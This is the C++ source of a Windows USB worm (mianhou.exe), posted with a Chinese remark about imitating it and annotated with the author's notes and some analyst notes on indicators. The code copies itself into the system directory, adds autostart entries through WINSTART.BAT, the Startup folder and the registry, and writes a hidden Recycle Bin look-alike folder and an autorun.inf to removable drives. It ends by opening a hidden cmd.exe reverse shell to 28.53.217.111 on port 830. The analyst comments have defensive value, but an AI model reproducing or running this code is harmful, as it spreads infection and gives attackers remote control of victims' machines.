当然不是我写的,但会仿写:
// MyVirus2.cpp : Defines the entry point for the application.
//
// MyVirus1.cpp : Defines the entry point for the application.
//
// WindowsXP2.cpp : Defines the entry point for the application.
//
#include "stdafx.h"
#include <stdio.h>
#include <windows.h>
#include <iostream.h>
#include <mmsystem.h>
#include <process.h>
#include <winsock2.h>
#pragma comment(lib,"Ws2_32")
// Forward declarations for the routines defined later in this file.
// Call order in WinMain: InitData -> Scandisk (which polls Checkdisk) -> VirusFunc.
void InitData();
void VirusFunc();
bool Checkdisk();
void Scandisk();
//void ClipCursorr();
// Hook-procedure-shaped callback: ignores all three arguments and always returns 1.
// Nothing in this listing installs it (no SetWindowsHookEx call is visible), so it
// is dead code as shown.
// NOTE(review): the name suggests a keyboard hook; a hook procedure that returns
// non-zero without calling CallNextHookEx would keep the event from being passed
// on. The intended hook type cannot be confirmed from this file.
LRESULT CALLBACK keyproc(int code, WPARAM wParam, LPARAM lParam)
{
//MessageBox(NULL, "1", "HOOK", MB_OK);
return 1;
}
// Drive root string probed by Checkdisk; InitData sets it to "C:" and Checkdisk
// overwrites the first character with each candidate letter.
char szDriverName[4] = {0};
// Path of the dropped copy (<system directory>\mianhou.exe), built in VirusFunc.
char szTmp[MAX_PATH] = {0};
// Drive letter of the first removable drive found by Checkdisk; 0 until one is found.
// This is a single char, not a string buffer.
char USB = 0;
// Resets the two global buffers before the drive scan starts.
void InitData()
{
// The format string ends at the embedded NUL, so szDriverName becomes "C:"
// (no trailing backslash).
sprintf(szDriverName, "C:\0");
ZeroMemory(&szTmp, sizeof(szTmp));
}
// Behavior summary (author's notes, translated):
//  - copies itself into the system directory and runs the copy
//  - modifies the registry startup entry
//  - creates recyc1e.{645FF040-5081-101B-9F08-00AA002F954E} and autorun.inf on the USB drive
//  - writes the launch content into autorun.inf
//  - adds some statements for controlling the computer
//
// Analyst notes (what the code below shows, in order):
//  1. Host persistence: <system directory>\mianhou.exe, c:\WINDOWS\WINSTART.BAT,
//     a copy in the All Users Startup folder, and value "1" under
//     HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run.
//  2. Explorer view settings "ShowSuperHidden" and "Hidden" under
//     HKCU\...\Explorer\Advanced are conditionally rewritten.
//  3. Removable-drive artifacts: a hidden+system+read-only directory whose name
//     imitates the Recycle Bin (digit '1' in place of 'l', followed by the
//     Recycle Bin CLSID) and a hidden+system+read-only autorun.inf pointing at
//     mianhou.exe inside it.
//  4. Network: outbound TCP to 28.53.217.111 port 830, then a hidden cmd.exe whose
//     standard handles are the socket.
// Defensive relevance: each item above is an artifact to hunt for; AutoRun can be
// disabled for removable media (NoDriveTypeAutoRun policy) and egress filtering
// blocks stage 4.
// Takes no parameters and returns nothing; almost no API result is checked.
void VirusFunc()
{
HKEY key;
char szPath[MAX_PATH] = {0};
char szName[MAX_PATH] = "mianhou.exe";
// szPath = full path of the running image.
GetModuleFileName(NULL, szPath, MAX_PATH);
// szTmp (global) = <system directory>\mianhou.exe
GetSystemDirectory(szTmp, MAX_PATH);
lstrcat(szTmp, "\\");
lstrcat(szTmp, szName);// USB-to-host stage: szPath is the path of the running binary, szTmp is where the copy lives on the host
// lstrcmpi returns non-zero when the two paths differ, i.e. when the process is
// not already running from the system-directory copy.
if ( lstrcmpi(szTmp, szPath))
{
CopyFile(szPath, szTmp, false);
Sleep(500);
// Launches the dropped copy with a hidden window; the current process keeps running.
WinExec(szTmp,SW_HIDE);
}// copy self into the system directory and run it
//szTmp[2] = '\0';
//lstrcat(szTmp, "WINDOWS");
char szTmp1[MAX_PATH];// szTmp1: WINSTART.BAT in the Windows directory; it is rewritten so the binary starts automatically
char szTmp2[MAX_PATH];
sprintf(szTmp1,"c:\\WINDOWS\\WINSTART.BAT");
//CreateFile(szTmp1, GENERIC_WRITE, FILE_SHARE_WRITE, 0, CREATE_ALWAYS, 0, 0);
FILE *bat;
// "w+" truncates any existing WINSTART.BAT. The result is used without a NULL
// check and the stream is not closed in this function.
// NOTE(review): an account that cannot write to c:\WINDOWS makes this fopen fail;
// the later stages are then presumably never reached - confirm on a test system.
bat = fopen(szTmp1,"w+");
fprintf(bat,"@ c:\\WINDOWS\\system32\\mianhou.exe\n");// autostart line for the dropped copy
// Hard-coded, localized (Chinese) All Users Startup folder path.
lstrcpy(szTmp2, "c:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\mianhou.exe");
CopyFile(szPath, szTmp2, false);// startup-folder copy
DWORD dw;
// REG_OPTION_VOLATILE: a key created this way is held in memory and is not
// preserved once the hive is unloaded; the flag is ignored if the key already
// exists. Forensically, look for this value in the live registry as well as in
// offline hives.
if ( RegCreateKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", 0L, NULL, REG_OPTION_VOLATILE, KEY_ALL_ACCESS, NULL, &key, &dw) == ERROR_SUCCESS)
RegSetValueEx(key, "1", 0, REG_SZ, (BYTE *)szTmp, lstrlen(szTmp));
// Only the RegSetValueEx above is guarded by the if; RegCloseKey runs either way.
RegCloseKey(key);// registry startup entry
DWORD mianhou1 = 0;
DWORD mianhou2 = 2;
Sleep(10000);
DWORD dwSize = 2550;
char szString[2550];
DWORD dwType;
if( RegOpenKey(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", &key) == ERROR_SUCCESS)
{
long lReturn = RegQueryValueEx(key, "ShowSuperHidden", NULL, &dwType, ( BYTE *)&szString, &dwSize);
// The write below runs only when the query returns 1; ERROR_SUCCESS is 0, so a
// successful query does not trigger it. Do not rely on this setting having been
// changed when triaging a host.
if(lReturn == 1)
{
mianhou1 = 0;
RegSetValueEx(key, "ShowSuperHidden", 0, REG_DWORD, (CONST BYTE *)&mianhou1, sizeof(DWORD));
}
}
if( RegOpenKey(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", &key) == ERROR_SUCCESS)
{
long lReturn = RegQueryValueEx(key, "Hidden", NULL, &dwType, ( BYTE *)&szString, &dwSize);
// Same condition as above: taken only when the query returns 1.
if(lReturn == 1)
{
mianhou2 = 2;
RegSetValueEx(key, "Hidden", 0, REG_DWORD, (CONST BYTE *)&mianhou2, sizeof(DWORD));
}
}
// Host-to-USB stage: produces two artifacts, autorun.inf and the recyc1e.{645FF040-5081-101B-9F08-00AA002F954E} directory, and copies the binary into that directory
HANDLE FileHandle;
char FileName[MAX_PATH];// FileName: location of autorun.inf
char FilePath[MAX_PATH];// FilePath: location of recyc1e.{645FF040-5081-101B-9F08-00AA002F954E} on the USB drive
char ExePath[MAX_PATH];// ExePath: location of mianhou.exe on the USB drive
// NOTE(review): USB is a single char global, not a NUL-terminated string, so what
// lstrcpy copies after the drive letter depends on the bytes that follow it in
// memory; observed artifact paths may not always have the intended X:\... form.
lstrcpy(FilePath, &USB);// take the USB drive letter
lstrcat(FilePath, ":\\recyc1e.{645FF040-5081-101B-9F08-00AA002F954E}");
CreateDirectory(FilePath, NULL);// create the directory
lstrcpy(ExePath, FilePath);
lstrcat(ExePath, "\\mianhou.exe");
// bFailIfExists is true here, so an existing mianhou.exe on the drive is not overwritten.
CopyFile(szTmp, ExePath, true);// copy the binary from the host into recyc1e.{645FF040-5081-101B-9F08-00AA002F954E} on the USB drive
lstrcpy(FileName, &USB);
lstrcat(FileName,":\\autorun.inf");
// CREATE_ALWAYS replaces any autorun.inf already present in the drive root.
FileHandle = CreateFile(FileName, GENERIC_WRITE, FILE_SHARE_WRITE, 0, CREATE_ALWAYS, 0, 0);// create autorun.inf in the USB root directory
//FileHandle = CreateFile(FileName, GENERIC_WRITE, FILE_SHARE_WRITE, 0, CREATE_NEW, 0, 0);
// autorun.inf content: open=, Shell\1\Command= and Shellexecute= all point at
// mianhou.exe inside the look-alike directory.
char FileContent[MAX_PATH] = "[autorun] \n open=.\\recyc1e.{645FF040-5081-101B-9F08-00AA002F954E}\\mianhou.exe \n Shell\\1=&打开(O) \n Shell\\1\\Command=.\\recyc1e.{645FF040-5081-101B-9F08-00AA002F954E}\\mianhou.exe \n Shellexecute=.\\recyc1e.{645FF040-5081-101B-9F08-00AA002F954E}\\mianhou.exe";
DWORD nWrite;
// Writes the whole MAX_PATH-byte buffer rather than the string length, so the
// file size requested is always MAX_PATH bytes - a usable triage indicator.
WriteFile(FileHandle, FileContent, MAX_PATH, &nWrite, NULL); // write the autorun.inf content
SetFileAttributes(FileName, FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_READONLY);
SetFileAttributes(FilePath, FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_READONLY);// mark autorun.inf and the recyc1e.{645FF040-5081-101B-9F08-00AA002F954E} directory as system, read-only and hidden
// Network stage. Indicators visible here: destination 28.53.217.111, TCP port 830,
// and a cmd.exe child process with no visible window whose stdin/stdout/stderr
// are a socket handle. Results of WSAStartup, WSASocket and connect are not checked.
WSADATA ws;
SOCKET s;
int ret;
WSAStartup(MAKEWORD(2,2), &ws);
s = WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
struct sockaddr_in server;
server.sin_family = AF_INET;
server.sin_port = htons(830);
server.sin_addr.s_addr = inet_addr("28.53.217.111");
connect(s, (struct sockaddr *)&server, sizeof(server));
STARTUPINFO si;
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow = SW_HIDE;
// All three standard handles of the child are set to the socket.
si.hStdInput = si.hStdOutput = si.hStdError = (void *)s;
char cmdLine[] = "cmd.exe";
PROCESS_INFORMATION ProcessInformation;
// Fifth argument (bInheritHandles) is 1 so the child inherits the socket handle.
// ret is stored but never read.
ret = CreateProcess(NULL, cmdLine, NULL, NULL, 1, 0, NULL, NULL, &si, &ProcessInformation);
}
// Looks for a removable drive by probing drive letters with GetDriveType.
// Returns true and stores the letter in the global USB for the first drive that
// reports DRIVE_REMOVABLE; returns false if none does.
// Letters 'C' through 'Y' are probed (the loop stops before 'Z'); A:, B: and Z:
// are never checked.
bool Checkdisk()
{
szDriverName[0] = 'C';
for ( szDriverName[0]='C'; szDriverName[0]<'Z'; szDriverName[0]++)
{
// szDriverName is "X:" as set up by InitData, with only the letter changing.
if (GetDriveType(szDriverName) == DRIVE_REMOVABLE)
{
USB = szDriverName[0];
return true;
}
}
return false;
}
// Blocks until Checkdisk reports a removable drive, polling every 10 seconds.
// Because WinMain calls this before VirusFunc, the file, registry and network
// activity in VirusFunc does not start until a removable drive is attached;
// an analysis run on a machine without one will show only this idle loop.
void Scandisk()
{
while(!Checkdisk())
{
//cout<<"1\n";
Sleep(10000);
}
}
// GUI-subsystem entry point; none of the four parameters is used and no window
// is created, so the process runs without any visible UI.
// Sequence: reset globals, wait for a removable drive, then run VirusFunc once
// and exit with code 0.
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
InitData();
// Does not return until a removable drive is present (see Scandisk).
Scandisk();
//::mciSendString("set cdaudio door open", NULL, 0, NULL);
//::mciSendString("set cdaudio door closed wait", NULL, 0, NULL);
VirusFunc();
//ClipCursorr();
return 0;
}